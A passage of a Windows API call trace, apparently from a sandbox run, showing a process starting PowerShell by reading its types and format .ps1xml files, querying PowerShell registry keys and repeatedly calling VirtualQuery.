	[0393.069] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.070] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.070] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.070] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.070] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.070] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.071] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1000, lpOverlapped=0x0) returned 1
	[0393.071] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x1b4, lpOverlapped=0x0) returned 1
	[0393.071] ReadFile (in: hFile=0x1c8, lpBuffer=0x2ce5fe0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d648, lpOverlapped=0x0 | out: lpBuffer=0x2ce5fe0*, lpNumberOfBytesRead=0x16d648*=0x0, lpOverlapped=0x0) returned 1
	[0393.071] CloseHandle (hObject=0x1c8) returned 1
	[0393.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0393.071] SetErrorMode (uMode=0x1) returned 0x1
	[0393.071] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d5c0 | out: lpFileInformation=0x16d5c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0393.071] SetErrorMode (uMode=0x1) returned 0x1
	[0393.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0393.072] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d6a8 | out: phkResult=0x16d6a8*=0x1c8) returned 0x0
	[0393.072] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d62c, lpData=0x0, lpcbData=0x16d628*=0x0 | out: lpType=0x16d62c*=0x1, lpData=0x0, lpcbData=0x16d628*=0x56) returned 0x0
	[0393.072] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c4740
	[0393.072] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d5fc, lpData=0x1b7c4740, lpcbData=0x16d5f8*=0x56 | out: lpType=0x16d5fc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d5f8*=0x56) returned 0x0
	[0393.072] CoTaskMemFree (pv=0x1b7c4740) 
	[0393.072] RegCloseKey (hKey=0x1c8) returned 0x0
	[0393.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0393.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x16d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0393.938] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.941] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.942] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.942] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.942] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.942] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.943] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.944] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.950] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.950] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.950] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.950] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.950] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.951] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.951] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.951] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.956] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.960] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.960] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.960] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.960] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.961] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.961] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.961] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.961] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.961] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.962] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.962] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.962] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.962] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.963] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.965] VirtualQuery (in: lpAddress=0x16c3a0, lpBuffer=0x16d260, dwLength=0x30 | out: lpBuffer=0x16d260*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.965] VirtualQuery (in: lpAddress=0x16c3a0, lpBuffer=0x16d260, dwLength=0x30 | out: lpBuffer=0x16d260*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0393.965] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0394.303] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0394.317] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0394.317] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0394.317] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0394.321] CoTaskMemAlloc (cb=0x104) returned 0x34e580
	[0394.321] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34e580, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0394.321] CoTaskMemFree (pv=0x34e580) 
	[0394.323] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0394.327] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0394.327] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0394.327] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0394.327] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0394.328] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0394.328] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0394.329] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0394.329] VirtualQuery (in: lpAddress=0x16c390, lpBuffer=0x16d250, dwLength=0x30 | out: lpBuffer=0x16d250*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0394.330] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d848 | out: phkResult=0x16d848*=0x1c8) returned 0x0
	[0394.330] RegQueryValueExW (in: hKey=0x1c8, lpValueName="path", lpReserved=0x0, lpType=0x16d85c, lpData=0x0, lpcbData=0x16d858*=0x0 | out: lpType=0x16d85c*=0x1, lpData=0x0, lpcbData=0x16d858*=0x74) returned 0x0
	[0394.330] RegQueryValueExW (in: hKey=0x1c8, lpValueName="path", lpReserved=0x0, lpType=0x16d7cc, lpData=0x0, lpcbData=0x16d7c8*=0x0 | out: lpType=0x16d7cc*=0x1, lpData=0x0, lpcbData=0x16d7c8*=0x74) returned 0x0
	[0394.330] CoTaskMemAlloc (cb=0x78) returned 0x1b7c53b0
	[0394.330] RegQueryValueExW (in: hKey=0x1c8, lpValueName="path", lpReserved=0x0, lpType=0x16d79c, lpData=0x1b7c53b0, lpcbData=0x16d798*=0x74 | out: lpType=0x16d79c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x16d798*=0x74) returned 0x0
	[0394.330] CoTaskMemFree (pv=0x1b7c53b0) 
	[0394.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x16d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0394.330] SetErrorMode (uMode=0x1) returned 0x1
	[0394.331] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x16d720 | out: lpFileInformation=0x16d720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0394.331] SetErrorMode (uMode=0x1) returned 0x1
	[0394.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0394.331] SetErrorMode (uMode=0x1) returned 0x1
	[0394.331] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d720 | out: lpFileInformation=0x16d720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0394.331] SetErrorMode (uMode=0x1) returned 0x1
	[0394.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0394.332] SetErrorMode (uMode=0x1) returned 0x1
	[0394.332] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d720 | out: lpFileInformation=0x16d720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0394.332] SetErrorMode (uMode=0x1) returned 0x1
	[0394.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0394.332] SetErrorMode (uMode=0x1) returned 0x1
	[0394.332] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d720 | out: lpFileInformation=0x16d720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0394.332] SetErrorMode (uMode=0x1) returned 0x1
	[0394.332] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0394.332] SetErrorMode (uMode=0x1) returned 0x1
	[0394.332] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d720 | out: lpFileInformation=0x16d720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0394.332] SetErrorMode (uMode=0x1) returned 0x1
	[0394.333] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0394.333] SetErrorMode (uMode=0x1) returned 0x1
